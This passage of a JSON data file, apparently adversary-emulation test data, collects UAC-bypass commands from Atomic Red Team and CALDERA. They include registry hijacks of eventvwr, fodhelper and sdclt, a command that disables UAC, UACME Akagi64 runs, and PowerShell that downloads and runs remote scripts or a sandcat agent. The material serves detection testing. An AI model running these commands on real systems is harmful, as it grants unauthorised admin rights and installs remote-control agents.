\"C:\\Users\\Public\\$name.exe -group #{group}\"; };\nReceive-Job -Job $job -Wait;\n", + "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"sandcat.go\");\n$wc.Headers.add(\"server\",\"#{server}\");\n$wc.Headers.add(\"defaultSleep\",\"60\");\n$wc.Headers.add(\"defaultGroup\",\"bypassed_u_bro\");\n$data=$wc.DownloadData($url);\n$name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\");\n[io.file]::WriteAllBytes(\"C:\\Users\\Public\\$name.exe\",$data);\n.\\Akagi64.exe 32 \"C:\\Users\\Public\\$name.exe -server #{server}\"\n" + ], + "commands": [ + { + "command": "reg.exe add hkcu\\software\\classes\\mscfile\\shell\\open\\command /ve /d \"C:\\Windows\\System32\\cmd.exe\" /f\ncmd.exe /c eventvwr.msc\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "New-Item \"HKCU:\\software\\classes\\mscfile\\shell\\open\\command\" -Force\nSet-ItemProperty \"HKCU:\\software\\classes\\mscfile\\shell\\open\\command\" -Name \"(default)\" -Value \"C:\\Windows\\System32\\cmd.exe\" -Force\nStart-Process \"C:\\Windows\\System32\\eventvwr.msc\"\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "reg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /ve /d \"C:\\Windows\\System32\\cmd.exe\" /f\nreg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /v \"DelegateExecute\" /f\nfodhelper.exe\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "New-Item \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" 
-Force\nNew-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force\nSet-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"(default)\" -Value \"C:\\Windows\\System32\\cmd.exe\" -Force\nStart-Process \"C:\\Windows\\System32\\fodhelper.exe\"\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "New-Item \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Force\nNew-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force\nSet-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"(default)\" -Value \"C:\\Windows\\System32\\cmd.exe\" -Force\nStart-Process \"C:\\Windows\\System32\\ComputerDefaults.exe\"\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "mkdir \"\\\\?\\C:\\Windows \\System32\\\"\ncopy \"C:\\Windows\\System32\\cmd.exe\" \"\\\\?\\C:\\Windows \\System32\\mmc.exe\"\nmklink c:\\testbypass.exe \"\\\\?\\C:\\Windows \\System32\\mmc.exe\"\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "New-Item -Force -Path \"HKCU:\\Software\\Classes\\Folder\\shell\\open\\command\" -Value 'cmd.exe /c notepad.exe'\nNew-ItemProperty -Force -Path \"HKCU:\\Software\\Classes\\Folder\\shell\\open\\command\" -Name \"DelegateExecute\"\nStart-Process -FilePath $env:windir\\system32\\sdclt.exe\nStart-Sleep -s 3\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "reg.exe ADD 
HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "PathToAtomicsFolder\\T1548.002\\src\\T1548.002.bat\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "\"%temp%\\uacme\\23 Akagi64.exe\"\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "\"%temp%\\uacme\\31 Akagi64.exe\"\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "\"%temp%\\uacme\\33 Akagi64.exe\"\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "\"%temp%\\uacme\\34 Akagi64.exe\"\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "\"%temp%\\uacme\\39 Akagi64.exe\"\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "\"%temp%\\uacme\\56 Akagi64.exe\"\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "\"%temp%\\uacme\\59 Akagi64.exe\"\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "\"%temp%\\uacme\\61 Akagi64.exe\"\n", + "source": 
"atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nUACBypass -noninteractive -command \"C:\\windows\\system32\\cmd.exe\" -technique magic", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nUACBypass -noninteractive -command \"C:\\windows\\system32\\calc.exe\" -technique ccmstp", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nUACBypass -noninteractive -command \"C:\\windows\\system32\\cmd.exe\" -technique DiskCleanup", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/dccuac.ps1')", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "New-ItemProperty -Path 
HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system -Name EnableLUA -PropertyType DWord -Value 0 -Force\n", + "source": "data/abilities/privilege-escalation/665432a4-42e7-4ee1-af19-a9a8c9455d0c.yml", + "name": "Set a registry key to allow UAC bypass" + }, + { + "command": ".\\Akagi64.exe 30 C:\\Windows\\System32\\cmd.exe\n", + "source": "data/abilities/privilege-escalation/95ad5d69-563e-477b-802b-4855bfb3be09.yml", + "name": "Dll Hijack of WOW64 logger wow64log.dll using Akagi.exe" + }, + { + "command": ".\\Akagi64.exe 45 C:\\Windows\\System32\\cmd.exe\n", + "source": "data/abilities/privilege-escalation/b7344901-0b02-4ead-baf6-e3f629ed545f.yml", + "name": "executes the slui exe file handler hijack" + }, + { + "command": "$url=\"#{server}/file/download\"; $wc=New-Object System.Net.WebClient; $wc.Headers.add(\"platform\",\"windows\"); $wc.Headers.add(\"file\",\"sandcat.go\"); $data=$wc.DownloadData($url); $name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\"); [io.file]::WriteAllBytes(\"C:\\Users\\Public\\$name.exe\",$data);\n$job = Start-Job -ScriptBlock { Import-Module -Name .\\Bypass-UAC.ps1; Bypass-UAC -Command \"C:\\Users\\Public\\$name.exe -group #{group}\"; };\nReceive-Job -Job $job -Wait;\n", + "source": "data/abilities/privilege-escalation/e3db134c-4aed-4c5a-9607-c50183c9ef9e.yml", + "name": "Bypass user account controls - medium" + }, + { + "command": "$url=\"#{server}/file/download\";\n$wc=New-Object 
System.Net.WebClient;\n$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"sandcat.go\");\n$wc.Headers.add(\"server\",\"#{server}\");\n$wc.Headers.add(\"defaultSleep\",\"60\");\n$wc.Headers.add(\"defaultGroup\",\"bypassed_u_bro\");\n$data=$wc.DownloadData($url);\n$name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\");\n[io.file]::WriteAllBytes(\"C:\\Users\\Public\\$name.exe\",$data);\n.\\Akagi64.exe 32 \"C:\\Users\\Public\\$name.exe -server #{server}\"\n", + "source": "data/abilities/privilege-escalation/e99cce5c-cb7e-4a6e-8a09-1609a221b90a.yml", + "name": "UIPI bypass with uiAccess application" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1548.002", + "display_name": "Abuse Elevation Control Mechanism: Bypass User Access Control", + "atomic_tests": [ + { + "name": "Bypass UAC using Event Viewer (cmd)", + "auto_generated_guid": "5073adf8-9a50-4bd9-b298-a9bd2ead8af9", + "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. 
More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\nUpon execution command prompt should be launched with administrative privelages\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "executable_binary": { + "description": "Binary to execute with UAC Bypass", + "type": "Path", + "default": "C:\\Windows\\System32\\cmd.exe" + } + }, + "executor": { + "command": "reg.exe add hkcu\\software\\classes\\mscfile\\shell\\open\\command /ve /d \"#{executable_binary}\" /f\ncmd.exe /c eventvwr.msc\n", + "cleanup_command": "reg.exe delete hkcu\\software\\classes\\mscfile /f >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Bypass UAC using Event Viewer (PowerShell)", + "auto_generated_guid": "a6ce9acf-842a-4af6-8f79-539be7608e2b", + "description": "PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\nUpon execution command prompt should be launched with administrative privelages\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "executable_binary": { + "description": "Binary to execute with UAC Bypass", + "type": "Path", + "default": "C:\\Windows\\System32\\cmd.exe" + } + }, + "executor": { + "command": "New-Item \"HKCU:\\software\\classes\\mscfile\\shell\\open\\command\" -Force\nSet-ItemProperty \"HKCU:\\software\\classes\\mscfile\\shell\\open\\command\" -Name \"(default)\" -Value \"#{executable_binary}\" -Force\nStart-Process \"C:\\Windows\\System32\\eventvwr.msc\"\n", + "cleanup_command": "Remove-Item \"HKCU:\\software\\classes\\mscfile\" -force -Recurse -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Bypass UAC using Fodhelper", + "auto_generated_guid": "58f641ea-12e3-499a-b684-44dee46bd182", + "description": "Bypasses User Account Control using the 
Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.\nUpon execution, \"The operation completed successfully.\" will be shown twice and command prompt will be opened.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "executable_binary": { + "description": "Binary to execute with UAC Bypass", + "type": "Path", + "default": "C:\\Windows\\System32\\cmd.exe" + } + }, + "executor": { + "command": "reg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /ve /d \"#{executable_binary}\" /f\nreg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /v \"DelegateExecute\" /f\nfodhelper.exe\n", + "cleanup_command": "reg.exe delete hkcu\\software\\classes\\ms-settings /f >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Bypass UAC using Fodhelper - PowerShell", + "auto_generated_guid": "3f627297-6c38-4e7d-a278-fc2563eaaeaa", + "description": "PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). 
Requires Windows 10.\nUpon execution command prompt will be opened.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "executable_binary": { + "description": "Binary to execute with UAC Bypass", + "type": "Path", + "default": "C:\\Windows\\System32\\cmd.exe" + } + }, + "executor": { + "command": "New-Item \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Force\nNew-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force\nSet-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"(default)\" -Value \"#{executable_binary}\" -Force\nStart-Process \"C:\\Windows\\System32\\fodhelper.exe\"\n", + "cleanup_command": "Remove-Item \"HKCU:\\software\\classes\\ms-settings\" -force -Recurse -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Bypass UAC using ComputerDefaults (PowerShell)", + "auto_generated_guid": "3c51abf2-44bf-42d8-9111-dc96ff66750f", + "description": "PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10\nUpon execution administrative command prompt should open\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "executable_binary": { + "description": "Binary to execute with UAC Bypass", + "type": "Path", + "default": "C:\\Windows\\System32\\cmd.exe" + } + }, + "executor": { + "command": "New-Item \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Force\nNew-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force\nSet-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"(default)\" -Value \"#{executable_binary}\" -Force\nStart-Process \"C:\\Windows\\System32\\ComputerDefaults.exe\"\n", + "cleanup_command": "Remove-Item \"HKCU:\\software\\classes\\ms-settings\" -force -Recurse -ErrorAction Ignore\n", + "name": "powershell", + 
"elevation_required": true + } + }, + { + "name": "Bypass UAC by Mocking Trusted Directories", + "auto_generated_guid": "f7a35090-6f7f-4f64-bb47-d657bf5b10c1", + "description": "Creates a fake \"trusted directory\" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems\nUpon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "executable_binary": { + "description": "Binary to execute with UAC Bypass", + "type": "Path", + "default": "C:\\Windows\\System32\\cmd.exe" + } + }, + "executor": { + "command": "mkdir \"\\\\?\\C:\\Windows \\System32\\\"\ncopy \"#{executable_binary}\" \"\\\\?\\C:\\Windows \\System32\\mmc.exe\"\nmklink c:\\testbypass.exe \"\\\\?\\C:\\Windows \\System32\\mmc.exe\"\n", + "cleanup_command": "rd \"\\\\?\\C:\\Windows \\\" /S /Q >nul 2>nul\ndel \"c:\\testbypass.exe\" >nul 2>nul\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Bypass UAC using sdclt DelegateExecute", + "auto_generated_guid": "3be891eb-4608-4173-87e8-78b494c029b7", + "description": "Bypasses User Account Control using a fileless method, registry only.\nUpon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe\n[Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)\nAdapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "command.to.execute": { + "description": "Command to execute", + "type": "String", + "default": "cmd.exe /c notepad.exe" + } + }, + "executor": { + "command": "New-Item -Force -Path \"HKCU:\\Software\\Classes\\Folder\\shell\\open\\command\" -Value '#{command.to.execute}'\nNew-ItemProperty 
-Force -Path \"HKCU:\\Software\\Classes\\Folder\\shell\\open\\command\" -Name \"DelegateExecute\"\nStart-Process -FilePath $env:windir\\system32\\sdclt.exe\nStart-Sleep -s 3\n", + "cleanup_command": "Remove-Item -Path \"HKCU:\\Software\\Classes\\Folder\" -Recurse -Force -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Disable UAC using reg.exe", + "auto_generated_guid": "9e8af564-53ec-407e-aaa8-3cb20c3af7f9", + "description": "Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key\nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f\n", + "cleanup_command": "reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 1 /f\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Bypass UAC using SilentCleanup task", + "auto_generated_guid": "28104f8a-4ff1-4582-bcf6-699dce156608", + "description": "Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/\n\nThere is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).\n\nFor example, we can set the windir registry kye to: \"cmd /k REM \"\n\nAnd forcefully run SilentCleanup task:\n\nschtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I\n\nREM will tell it to ignore everything after %windir% and treat it just as a NOTE. 
Therefore just executing cmd with admin privs.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_path": { + "description": "Path to the bat file", + "type": "String", + "default": "PathToAtomicsFolder\\T1548.002\\src\\T1548.002.bat" + } + }, + "executor": { + "command": "#{file_path}\n", + "name": "command_prompt", + "elevation_required": false + } + }, + { + "name": "UACME Bypass Method 23", + "auto_generated_guid": "8ceab7a2-563a-47d2-b5ba-0995211128d7", + "description": "Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.\nNote: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor: Leo Davidson derivative\n\nType:\tDll Hijack\n\nMethod: IFileOperation\n\nTarget:\t\\system32\\pkgmgr.exe\n\nComponent: DismCore.dll\n\nImplementation:\tucmDismMethod\n\nUCM Method:\tUacMethodDISM\n\nhttps://github.com/hfiref0x/UACME\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "uacme_exe": { + "description": "Path to uacme executable", + "type": "Path", + "default": "%temp%\\uacme\\23 Akagi64.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "UACME executable must exist on disk at specified location (#{uacme_exe})\n", + "prereq_command": "$tempPath = cmd /c echo #{uacme_exe}\nif (Test-Path \"$tempPath\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"$env:TEMP\\uacme.zip\"\nExpand-Archive $env:TEMP\\uacme.zip $env:TEMP\\uacme -Force\nRemove-Item $env:TEMP\\uacme.zip -Force\n" + } + ], + "executor": { + "command": "\"#{uacme_exe}\"\n", + "cleanup_command": "powershell Stop-Process -Name cmd -Force -ErrorAction Ignore\npowershell Stop-Process -Name mmc -Force -ErrorAction 
Ignore\n", + "name": "command_prompt" + } + }, + { + "name": "UACME Bypass Method 31", + "auto_generated_guid": "b0f76240-9f33-4d34-90e8-3a7d501beb15", + "description": "Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.\nNote: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor: Enigma0x3\n\nType:\tShell API\n\nMethod: Registry key manipulation\n\nTarget:\t\\system32\\sdclt.exe\n\nComponent: Attacker defined\n\nImplementation:\tucmSdcltIsolatedCommandMethod\n\nUCM Method:\tUacMethodShellSdclt\n\nhttps://github.com/hfiref0x/UACME\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "uacme_exe": { + "description": "Path to uacme executable", + "type": "Path", + "default": "%temp%\\uacme\\31 Akagi64.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "UACME executable must exist on disk at specified location (#{uacme_exe})\n", + "prereq_command": "$tempPath = cmd /c echo #{uacme_exe}\nif (Test-Path \"$tempPath\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"$env:TEMP\\uacme.zip\"\nExpand-Archive $env:TEMP\\uacme.zip $env:TEMP\\uacme -Force\nRemove-Item $env:TEMP\\uacme.zip -Force\n" + } + ], + "executor": { + "command": "\"#{uacme_exe}\"\n", + "cleanup_command": "powershell Stop-Process -Name cmd -Force -ErrorAction Ignore\npowershell Stop-Process -Name mmc -Force -ErrorAction Ignore\n", + "name": "command_prompt" + } + }, + { + "name": "UACME Bypass Method 33", + "auto_generated_guid": "e514bb03-f71c-4b22-9092-9f961ec6fb03", + "description": "Executes User Account Control Bypass according to the methods listed below. 
Upon successful execution you should see event viewer load and two administrative command prompts.\nNote: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor: winscripting.blog\n\nType:\tShell API\n\nMethod: Registry key manipulation\n\nTarget:\t\\system32\\fodhelper.exe\n\nComponent:\tAttacker defined\n\nImplementation:\tucmShellRegModMethod\n\nUCM Method:\tUacMethodMsSettings2\n\nhttps://github.com/hfiref0x/UACME\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "uacme_exe": { + "description": "Path to uacme executable", + "type": "Path", + "default": "%temp%\\uacme\\33 Akagi64.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "UACME executable must exist on disk at specified location (#{uacme_exe})\n", + "prereq_command": "$tempPath = cmd /c echo #{uacme_exe}\nif (Test-Path \"$tempPath\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"$env:TEMP\\uacme.zip\"\nExpand-Archive $env:TEMP\\uacme.zip $env:TEMP\\uacme -Force\nRemove-Item $env:TEMP\\uacme.zip -Force\n" + } + ], + "executor": { + "command": "\"#{uacme_exe}\"\n", + "cleanup_command": "powershell Stop-Process -Name cmd -Force -ErrorAction Ignore\npowershell Stop-Process -Name mmc -Force -ErrorAction Ignore\n", + "name": "command_prompt" + } + }, + { + "name": "UACME Bypass Method 34", + "auto_generated_guid": "695b2dac-423e-448e-b6ef-5b88e93011d6", + "description": "Executes User Account Control Bypass according to the methods listed below. 
Upon successful execution you should see event viewer load and two administrative command prompts.\nNote: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor: James Forshaw\n\nType:\tShell API\n\nMethod: Environment variables expansion\n\nTarget:\t\\system32\\svchost.exe via \\system32\\schtasks.exe\n\nComponent:\tAttacker defined\n\nImplementation:\tucmDiskCleanupEnvironmentVariable\n\nUCM Method:\tUacMethodDiskSilentCleanup\n\nhttps://github.com/hfiref0x/UACME\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "uacme_exe": { + "description": "Path to uacme executable", + "type": "Path", + "default": "%temp%\\uacme\\34 Akagi64.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "UACME executable must exist on disk at specified location (#{uacme_exe})\n", + "prereq_command": "$tempPath = cmd /c echo #{uacme_exe}\nif (Test-Path \"$tempPath\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"$env:TEMP\\uacme.zip\"\nExpand-Archive $env:TEMP\\uacme.zip $env:TEMP\\uacme -Force\nRemove-Item $env:TEMP\\uacme.zip -Force\n" + } + ], + "executor": { + "command": "\"#{uacme_exe}\"\n", + "cleanup_command": "powershell Stop-Process -Name cmd -Force -ErrorAction Ignore\npowershell Stop-Process -Name mmc -Force -ErrorAction Ignore\n", + "name": "command_prompt" + } + }, + { + "name": "UACME Bypass Method 39", + "auto_generated_guid": "56163687-081f-47da-bb9c-7b231c5585cf", + "description": "Executes User Account Control Bypass according to the methods listed below. 
Upon successful execution you should see event viewer load and two administrative command prompts.\nNote: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor: Stefan Kanthak\n\nType:\tDll Hijack\n\nMethod: .NET Code Profiler\n\nTarget:\t\\system32\\mmc.exe\n\nComponent:\tAttacker defined\n\nImplementation:\tucmCorProfilerMethod\n\nUCM Method:\tUacMethodCorProfiler\n\nhttps://github.com/hfiref0x/UACME\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "uacme_exe": { + "description": "Path to uacme executable", + "type": "Path", + "default": "%temp%\\uacme\\39 Akagi64.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "UACME executable must exist on disk at specified location (#{uacme_exe})\n", + "prereq_command": "$tempPath = cmd /c echo #{uacme_exe}\nif (Test-Path \"$tempPath\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"$env:TEMP\\uacme.zip\"\nExpand-Archive $env:TEMP\\uacme.zip $env:TEMP\\uacme -Force\nRemove-Item $env:TEMP\\uacme.zip -Force\n" + } + ], + "executor": { + "command": "\"#{uacme_exe}\"\n", + "cleanup_command": "powershell Stop-Process -Name cmd -Force -ErrorAction Ignore\npowershell Stop-Process -Name mmc -Force -ErrorAction Ignore\n", + "name": "command_prompt" + } + }, + { + "name": "UACME Bypass Method 56", + "auto_generated_guid": "235ec031-cd2d-465d-a7ae-68bab281e80e", + "description": "Executes User Account Control Bypass according to the methods listed below. 
Upon successful execution you should see event viewer load and two administrative command prompts.\nNote: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor: Hashim Jawad\n\nType:\tShell API\n\nMethod: Registry key manipulation\n\nTarget:\t\\system32\\WSReset.exe\n\nComponent:\tAttacker defined\n\nImplementation:\tucmShellRegModMethod\n\nUCM Method:\tUacMethodShellWSReset\n\nhttps://github.com/hfiref0x/UACME\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "uacme_exe": { + "description": "Path to uacme executable", + "type": "Path", + "default": "%temp%\\uacme\\56 Akagi64.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "UACME executable must exist on disk at specified location (#{uacme_exe})\n", + "prereq_command": "$tempPath = cmd /c echo #{uacme_exe}\nif (Test-Path \"$tempPath\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"$env:TEMP\\uacme.zip\"\nExpand-Archive $env:TEMP\\uacme.zip $env:TEMP\\uacme -Force\nRemove-Item $env:TEMP\\uacme.zip -Force\n" + } + ], + "executor": { + "command": "\"#{uacme_exe}\"\n", + "cleanup_command": "powershell Stop-Process -Name cmd -Force -ErrorAction Ignore\npowershell Stop-Process -Name mmc -Force -ErrorAction Ignore\n", + "name": "command_prompt" + } + }, + { + "name": "UACME Bypass Method 59", + "auto_generated_guid": "dfb1b667-4bb8-4a63-a85e-29936ea75f29", + "description": "Executes User Account Control Bypass according to the methods listed below. 
